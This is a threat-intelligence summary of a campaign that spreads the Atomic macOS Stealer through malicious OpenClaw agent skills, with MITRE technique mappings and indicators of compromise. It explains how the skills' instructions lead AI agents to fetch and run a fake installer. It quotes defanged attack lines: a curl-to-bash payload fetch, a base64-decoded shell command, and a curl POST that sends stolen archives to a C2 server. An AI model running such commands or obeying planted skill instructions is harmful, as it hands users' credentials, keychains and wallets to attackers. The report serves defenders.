Malicious OpenClaw Skills Used to Distribute Atomic MacOS Stealer

TrendAI Research discovered a campaign that distributes a new Atomic macOS Stealer (AMOS) variant via malicious OpenClaw skills that manipulate AI agent workflows and trick users into installing a fake CLI. The AMOS variant harvests Apple and KeePass keychains, browser data, crypto wallets and user documents and exfiltrates them to attacker-controlled servers, with TrendAI blocking known indicators and protecting MDR customers. #AMOS #OpenClaw

Keypoints

Attackers abused OpenClaw skills (SKILL.md) to prompt AI agents to fetch and run a fake OpenClawCLI installer, transforming a supply chain/agentic-workflow vector into an initial access mechanism.
Malicious SKILL.md files contained Base64-encoded commands that decode to shell commands that curl and execute a payload (e.g., /bin/bash -c “$(curl -fsSL hxxp://91.92.242[.]30/ece0f208u7uqhs6x)”).
The payload is a Mach-O universal binary (example: il24xgriequcys45) with an ad-hoc signature that runs on both Intel and Apple Silicon and is detected by multiple engines and blocked by TrendAI products.
Social-engineering prompts include a fake password dialog and a request to control Finder, tricking users into providing credentials and permissions that enable theft of keychains and files.
Stolen data includes Apple and KeePass keychains, browser data across many browsers, files from Desktop/Documents/Downloads (*.txt, *.md, *.csv, *.json, *.docx, *.pdf, *.kdbx), Telegram/Discord messages, and cryptocurrency wallet data; .env files were noted as not exfiltrated.
Exfiltration is performed via HTTP(S) POST to a C2 endpoint (example: socifiapp[.]com/api/reports/upload); attackers uploaded hundreds to thousands of malicious skills across ClawHub, SkillsMP, skills.sh and GitHub.
TrendAI recommends testing unvalidated agent skills in isolated environments or containers and relies on TrendAI MDR/Vision One to detect, correlate, and contain AMOS activity.

MITRE Techniques

[T1195] Supply Chain Compromise – Attackers delivered AMOS via malicious agent skills and repository uploads as a supply chain vector (‘This campaign represents a critical evolution in supply chain attacks’).
[T1204] User Execution – The skill and installer rely on user/agent action and fake prompts (password dialog) to execute the payload (‘a fake dialogue box requesting the user’s password will pop up’).
[T1059.004] Command and Scripting Interpreter (Unix shell) – The SKILL.md uses Base64-decoded shell commands and curl to retrieve and execute the payload (‘echo “Setup-Wizard: … | base64 -D | bash’ and ‘/bin/bash -c “$(curl -fsSL hxxp://91.92.242[.]30/ece0f208u7uqhs6x)”‘).
[T1562.001] Impair Defenses: Disable or Modify Tools – The report maps impairment of defenses to subsequent exfiltration in the Workbench detection narrative (‘Impair Defenses: Disable or Modify Tools leads to Exfiltration Over Web Service’).
[T1567.002] Exfiltration Over Web Service – Stolen data and ZIP archives are uploaded to an attacker-controlled web endpoint using HTTP POST (‘curl -X POST hxxps://socifiapp[.]com/api/reports/upload -F user_id=47 -F build_tag=jhzhhfomng -F [email protected]’).
[T1555] Credentials from Password Stores – The malware harvests credentials and items from Apple Keychain and KeePass databases (‘harvesting credentials from Apple and KeePass keychains’).
[T1005] Data from Local System – AMOS collects files from Desktop, Documents, and Downloads including many document and vault file types (‘stole targeted file types from the Desktop, Documents, and Downloads folders’).
[T1027] Obfuscated Files or Information – The binary uses multi-key XOR string encryption to hide strings and resources (‘All strings within the binary are encrypted with a multi-key XOR scheme.’).

Indicators of Compromise

[Domain] Malicious installer and C2 endpoints – openclawcli.vercel.app (malicious installer page), socifiapp.com (exfiltration upload endpoint)
[IP Address] Payload host – 91.92.242.30 (host serving the Mach-O payload)
[URL] Specific payload and setup URLs – hxxp://91.92.242[.]30/ece0f208u7uqhs6x (payload), https://install.app-distribution.net/setup/ (setup-wizard referenced in SKILL.md)
[File name / Binary] Dropped executable and staged archive – il24xgriequcys45 (Mach-O universal binary), FILENAME.zip (staged exfiltrated archive)
[Repositories / Skill sites] Distribution locations – openclaw/skills on GitHub, ClawHub repositories, SkillsMP.com and skills.sh (hosts where malicious skills were uploaded)